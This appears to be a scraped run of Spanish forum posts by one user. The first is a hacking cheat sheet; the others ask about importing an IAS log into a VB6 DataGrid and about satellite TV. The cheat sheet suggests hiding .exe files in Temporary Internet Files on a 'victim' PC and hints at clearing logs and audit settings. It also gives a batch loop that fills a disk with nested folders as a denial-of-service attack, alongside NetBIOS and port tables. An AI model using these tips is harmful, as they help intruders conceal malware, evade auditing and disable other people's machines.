    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing
    HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\CrashOnAuditFail

    Inicio/Configuración/Barra de tareas y menú Inicio/Opciones avanzadas/Borrar.
    %systemroot%\system32\LogFiles

    Ojo con los .log y los .evt
    Podemos hacer
    C:\>dir /s *.log >All_Logs.txt
    C:\>dir /s *.evt >All_Event.txt

    *******************************************************************************
    *******************************************************************************
    Excelente lugar para esconder .exe
    Windows7
    C:\Users\loko\AppData\Local\Microsoft\Windows\Temporary Internet Files>

    Windows Xp
    C:\Documents and Settings\Usuario\Configuración Local\Archivos temporales de Internet\


    Nota:
    El motivo es muy sencillo no se ven desde el explorer y aun cuando se borre la cache de
    iexplore sigue ahí.
    Donde dice Usuario en Windows Xp se debe sustituir por el usuario de la PC Víctima.

    *******************************************************************************
    *******************************************************************************
    Hacker actuales reconocidos, buscar redacciones y programas en www.google.com
    Gospel
    Lympex
    Rojodos
    HD Moore
    Vic_Thor
    Andrés Tarascó Acuña
    *******************************************************************************
    *******************************************************************************
    Llenado de disco duro solo a base de carpetas (DOS más usado).
    Hacer un cmd o bat con las siguientes líneas.

    mkdir.bat
    ------------------------------------------------------------------------------
    :l
    mkdir AAA
    cd AAA
    goto l
    ------------------------------------------------------------------------------
    Ejecutar.
    C:\>mkdir.bat

    *******************************************************************************
    *******************************************************************************
    Servicios de Netbios.

    Nombre                Sufijo    Tipo    Servicio
    ------------------------------------------------------------------------------
    <nombre_del_ordenador>   00         U       Workstation Service
    <nombre_del_ordenador>   01         U       Messenger Service
    <\\_MSBROWSE_>           01         G       Master Browser
    <nombre_del_ordenador>   03         U       Messenger Service
    <nombre_del_ordenador>   06         U       RAS Server Service
    <nombre_del_ordenador>   1F         U       NetDDE Service
    <nombre_del_ordenador>   20         U       File Server Service
    <nombre_del_ordenador>   21         U       RAS Client Service
    <nombre_del_ordenador>   22         U       Exchange Interchange
    <nombre_del_ordenador>   23         U       Exchange Store
    <nombre_del_ordenador>   24         U       Exchange Directory
    <nombre_del_ordenador>   30         U       Modem Sharing Server Service
    <nombre_del_ordenador>   31         U       Modem Sharing Client Service
    <nombre_del_ordenador>   43         U       SMS Client Remote Control
    <nombre_del_ordenador>   44         U       SMS Admin Remote Control Tool
    <nombre_del_ordenador>   45         U       SMS Client Remote Chat
    <nombre_del_ordenador>   46         U       SMS Client Remote Transfer
    <nombre_del_ordenador>   4C         U       DEC Pathworks TCPIP Service
    <nombre_del_ordenador>   52         U       DEC Pathworks TCPIP Service
    <nombre_del_ordenador>   87         U       Exchange MTA
    <nombre_del_ordenador>   6A         U       Exchange IMC
    <nombre_del_ordenador>   BE         U       Network Monitor Agent
    <nombre_del_ordenador>   BF         U       Network Monitor Apps
    <nombre_del_usuario>     03         U       Messenger Service
    <dominio>                00         G       Domain Name
    <dominio>                1B         U       Domain Master Browser
    <dominio>                1C         G       Domain Controllers
    <dominio>                1D         U       Master Browser
    <dominio>                1E         G       Browser Service Elections
    <INetServicios>          1C         G       Internet Information Server
    <ISnombre_de_ordenador>  00         U       Internet Information Server

    *******************************************************************************
    *******************************************************************************
    Puertos.
    Solo es posible de 1 al 65536

    Nombre de la función      Puerto   Protocolo/Función
    echo                      7             tcp
    echo                      7             udp
    discard                  9              tcp sink null
    discard                     9              udp sink null
    systat                      11          tcp
    systat                      11         tcp users
    daytime                   13         tcp
    daytime                   13         udp
    netstat                  15         tcp
    qotd                      17         tcp quote
    qotd                      17         udp quote
    chargen                   19         tcp ttytst source
    chargen                   19         udp ttytst source
    ftp-data                   20         tcp
    ftp                      21         tcp
    telnet                      23         tcp
    smtp                      25         tcp mail
    time                      37         tcp timserver
    time                      37         udp timserver
    rlp                      39          udp resource # resource location
    name                      42         tcp nameserver
    name                      42         udp nameserver
    whois                      43         tcp nicname # usually to sri-nic
    domain                       53          tcp nameserver # name-domain server
    domain                       53         udp nameserver
    nameserver                   53          tcp domain # name-domain server
    nameserver                   53         udp domain
    mtp                      57         tcp # deprecated
    bootp                      67         udp # boot program server
    tftp                      69         udp
    rje                      77         tcp netrjs
    finger                      79         tcp
    link                      87           tcp ttylink
    supdup                      95         tcp
    hostnames                   101          tcp hostn
#26
Programación Visual Basic / DataGrid
13 Agosto 2009, 23:13 PM
Hola intento hacer algo parecido al Ias Log Viewer en Visual Basic 6.0 pero nunca he hecho nada con base de datos me pudieran sugerir un codigo para importar IN0708.log a un DataGrid ubicado en un Form de Visual Basic.

Aqui dejo una muestra para cualquier posible sugerencia.
--------------------------------------------------------------------------------------------------
10.8.1.5,elena,08/09/2008,11:45:10,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 1,44,172,8,10.8.1.11,12,1500,13,1,50,1,51,1,55,1249843510,45,2,40,1,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x015941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
10.8.1.5,elena,08/09/2008,11:46:11,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 1,44,172,8,10.8.1.11,12,1500,13,1,50,1,51,1,55,1249843569,45,2,46,63,43,9567,42,7006,48,101,47,56,49,1,40,2,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x015941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
10.8.1.5,elena,08/09/2008,12:09:31,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 2,44,173,8,10.8.1.11,12,1500,13,1,50,3,51,1,55,1249844971,45,2,40,1,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x005941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
10.8.1.5,elena,08/09/2008,12:10:10,RAS,NEXXUS,4,10.8.1.5,6,2,7,1,5,4,61,0,77,CONNECT 24000,25,311 1 10.8.1.5 08/09/2008 17:12:33 2,44,173,8,10.8.1.11,12,1500,13,1,50,3,51,1,55,1249845008,45,2,46,42,43,2893,42,7109,48,55,47,59,49,1,40,2,4108,10.8.1.5,4147,311,4148,MSRASV5.20,4160,MSRASV5.10,4120,0x005941484F4F,4294967206,4,4154,Use Windows authentication for all users,4136,4,4142,0
--------------------------------------------------------------------------------------------------

Gracias por adelantado


AngelFire
#27
Sugerencias y dudas sobre el Foro / DVB-S
8 Junio 2006, 20:59 PM
Hola soy nuevo en este sitio y no se si en el foro hay un espacio dedicado a la televesion digital por satelite pues me interesa todo los relacionado con este.De no haber ninguno en este sitio alguien conoce alguno link que me puedan recomendar.



                                                bye


                                         AngelFire